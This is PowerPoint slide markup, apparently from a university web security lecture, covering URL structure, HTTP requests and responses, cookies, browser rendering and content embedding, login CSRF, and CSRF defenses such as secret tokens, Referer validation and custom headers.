            <a:ext cx="8350250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91000" y="4267200"/>
            <a:ext cx="2590800" cy="2365375"/>
            <a:chOff x="4191000" y="4267200"/>
            <a:chExt cx="2590800" cy="2365375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4191000" y="6232525"/>
              <a:ext cx="19923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9" tIns="45719" rIns="91439" bIns="45719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40458C">
                      <a:lumMod val="50000"/>
                    </a:srgbClr>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" pitchFamily="-65" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>User credentials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479925" y="4267200"/>
              <a:ext cx="2301875" cy="47942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>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="5" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="4618038" y="5218112"/>
              <a:ext cx="1485900" cy="5429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675188" y="4403725"/>
            <a:ext cx="2122487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296" tIns="41148" rIns="82296" bIns="41148">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr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rPr>
              <a:t>Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr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rPr>
              <a:t>SessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C">
                    <a:lumMod val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=523FA4cd2E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2481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Login CSRF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="717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57200" y="1471613"/>
          <a:ext cx="7924800" cy="511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7" name="Acrobat Document" r:id="rId3" imgW="6998400" imgH="4521600" progId="AcroExch.Document.7">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Acrobat Document" r:id="rId3" imgW="6998400" imgH="45216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71613"/>
                        <a:ext cx="7924800" cy="511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4191000" y="5334000"/>
            <a:ext cx="2667000" cy="838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65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381500" y="4152900"/>
            <a:ext cx="2057400" cy="3048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CSRF Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86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Secret Validation Token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Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> Validation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Custom HTTP Header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5318125" y="61452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14800" y="2438400"/>
            <a:ext cx="4133850" cy="457200"/>
            <a:chOff x="2832" y="1008"/>
            <a:chExt cx="2604" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86032" name="Rectangle 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="1008"/>
              <a:ext cx="254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  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86033" name="Text Box 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="1035"/>
              <a:ext cx="260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  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>&lt;input type=hidden value=23a3af01b&gt;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14800" y="4038600"/>
            <a:ext cx="4953000" cy="457200"/>
            <a:chOff x="2832" y="2050"/>
            <a:chExt cx="2986" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86030" name="Rectangle 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="2050"/>
              <a:ext cx="2880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  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86031" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="2078"/>
              <a:ext cx="29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err="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>Referer</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>: http://www.facebook.com/home.php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114800" y="5867400"/>
            <a:ext cx="3568700" cy="457200"/>
            <a:chOff x="2832" y="3051"/>
            <a:chExt cx="2248" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86028" name="Rectangle 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="3051"/>
              <a:ext cx="220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40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86029" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="3078"/>
              <a:ext cx="22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FFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-65" charset="-128"/>
                </a:rPr>
                <a:t>X-Requested-By: XMLHttpRequest</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8602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943350"/>
            <a:ext cx="1524000" cy="7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6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613400"/>
            <a:ext cx="10287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7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2700" y="2247900"/>
            <a:ext cx="800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53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Web platform, security mechanisms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Http/s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rendering content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Isolation: same-origin policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Frame communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Frame navigation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>nterface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Frames and frame busting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Redirects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URLs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135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Global identifiers of network-retrievable documents </a:t>
            </a:r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sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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 http://stanford.edu:81/class?name=cs155#homework</a:t>
            </a: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Special characters are encoded as hex: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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%0A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = newline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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%20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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = space, %2B = +  (special exception)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2855913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371600" y="2855913"/>
            <a:ext cx="1371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2743200" y="2855913"/>
            <a:ext cx="246063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3048000" y="2855913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3657600" y="2855913"/>
            <a:ext cx="1371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5029200" y="2855913"/>
            <a:ext cx="1387475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2"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="103188" y="3535363"/>
            <a:ext cx="914400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val 108333"/>
              <a:gd name="adj3" fmla="val -145833"/>
              <a:gd name="adj4" fmla="val 11406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Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24587" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="4262438"/>
            <a:ext cx="1143000" cy="269875"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val 108333"/>
              <a:gd name="adj3" fmla="val -364361"/>
              <a:gd name="adj4" fmla="val 13236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Hostname</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24588" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2151063" y="4379913"/>
            <a:ext cx="914400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val 108333"/>
              <a:gd name="adj3" fmla="val -413694"/>
              <a:gd name="adj4" fmla="val 9847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Port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24589" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4294188" y="4370388"/>
            <a:ext cx="914400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -422736"/>
              <a:gd name="adj4" fmla="val -7607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Path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24590" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6315075" y="4533900"/>
            <a:ext cx="914400" cy="266700"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -476426"/>
              <a:gd name="adj4" fmla="val -148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Query</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24591" name="AutoShape 19"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3810000"/>
            <a:ext cx="1292225" cy="282575"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 42856"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val -194444"/>
              <a:gd name="adj4" fmla="val -5442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Fragment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2241550"/>
            <a:ext cx="8305800" cy="2670175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="808080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GET /index.html HTTP/1.1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Accept: image/gif, image/x-bitmap, image/jpeg, */*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Accept-Language: en</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Connection: Keep-Alive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User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)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Host: www.example.com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Referer: http://www.google.com?q=dingbats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1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Request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996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Method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057400" y="1600200"/>
            <a:ext cx="577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File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200400" y="1600200"/>
            <a:ext cx="1657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HTTP version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990600" y="1924050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362200" y="1924050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886200" y="1924050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620000" y="1600200"/>
            <a:ext cx="1085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Headers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7391400" y="1976438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600200" y="5272088"/>
            <a:ext cx="2381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Data – none for GET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 flipV="1">
            <a:off x="838200" y="4733925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200400" y="4905375"/>
            <a:ext cx="1263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Blank line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 flipV="1">
            <a:off x="838200" y="4429125"/>
            <a:ext cx="2362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4768" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="595313" y="6019800"/>
            <a:ext cx="8120493" cy="46166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GET :   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>no side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>effect           POST :   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>possible side </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>effect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web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browse the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Users should be able to visit a variety of web sites, without incurring harm:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No stolen information (without user’s permission)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Site A cannot compromise session at Site B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Secure web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Applications delivered over the web should have the same security properties we require for stand-alone applications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ideas?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54075" y="2589213"/>
            <a:ext cx="7086600" cy="2862262"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="80808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HTTP/1.0 200 OK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Date: Sun, 21 Apr 1996 02:20:42 GMT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Server: Microsoft-Internet-Information-Server/5.0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Connection: keep-alive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Content-Type: text/html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Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT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Set-Cookie: …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Content-Length: 2543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&lt;HTML&gt; Some data... blah, blah, blah &lt;/HTML&gt;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Response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77875" y="1619250"/>
            <a:ext cx="1657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HTTP version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539875" y="19431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597150" y="1619250"/>
            <a:ext cx="1479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Status code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237037" y="1619250"/>
            <a:ext cx="182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Reason phrase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2530475" y="1943100"/>
            <a:ext cx="685800" cy="661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3063875" y="1943100"/>
            <a:ext cx="1676400" cy="738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483475" y="1695450"/>
            <a:ext cx="1085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Headers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6569075" y="2019300"/>
            <a:ext cx="1371600" cy="1042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8199437" y="3671888"/>
            <a:ext cx="679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Data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7050087" y="4052888"/>
            <a:ext cx="145415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5772150"/>
            <a:ext cx="11826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/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27663" name="Freeform 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="344487" y="4400550"/>
            <a:ext cx="434975" cy="1460500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 169607 w 435078"/>
              <a:gd name="T1" fmla="*/ 1460090 h 1460090"/>
              <a:gd name="T2" fmla="*/ 36872 w 435078"/>
              <a:gd name="T3" fmla="*/ 589936 h 1460090"/>
              <a:gd name="T4" fmla="*/ 66368 w 435078"/>
              <a:gd name="T5" fmla="*/ 117987 h 1460090"/>
              <a:gd name="T6" fmla="*/ 435078 w 435078"/>
              <a:gd name="T7" fmla="*/ 0 h 1460090"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 435078"/>
              <a:gd name="T13" fmla="*/ 0 h 1460090"/>
              <a:gd name="T14" fmla="*/ 435078 w 435078"/>
              <a:gd name="T15" fmla="*/ 1460090 h 14600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5078" h="1460090">
                <a:moveTo>
                  <a:pt x="169607" y="1460090"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="111843" y="1136855"/>
                  <a:pt x="54079" y="813620"/>
                  <a:pt x="36872" y="589936"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19665" y="366252"/>
                  <a:pt x="0" y="216310"/>
                  <a:pt x="66368" y="117987"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132736" y="19664"/>
                  <a:pt x="283907" y="9832"/>
                  <a:pt x="43507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Content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Rendering and events</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5120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Basic execution model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Each browser window or frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Loads content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Renders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Processes HTML and scripts to display page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>May involve images, subframes, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Responds to events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Events can be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>User actions: OnClick, OnMouseover</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Rendering: OnLoad, OnBeforeUnload </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Timing: setTimeout(),  clearTimeout()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0772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Pages can embed content from many sources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76400"/>
            <a:ext cx="84582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2400"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>Frames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//site.com/frame.html”  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>&gt;   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&gt;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828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>Scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
              <a:t>script   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//site.com/script.js”  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;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828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2400"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="1828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0" smtClean="0"/>
              <a:t>link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>"  type="text /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>//site/com/theme.css</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>"  /&gt;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828800" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" u="sng" dirty="0" smtClean="0"/>
              <a:t>Objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  (flash):       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>[using    swfobject.js   script ]</a:t>
            </a:r>
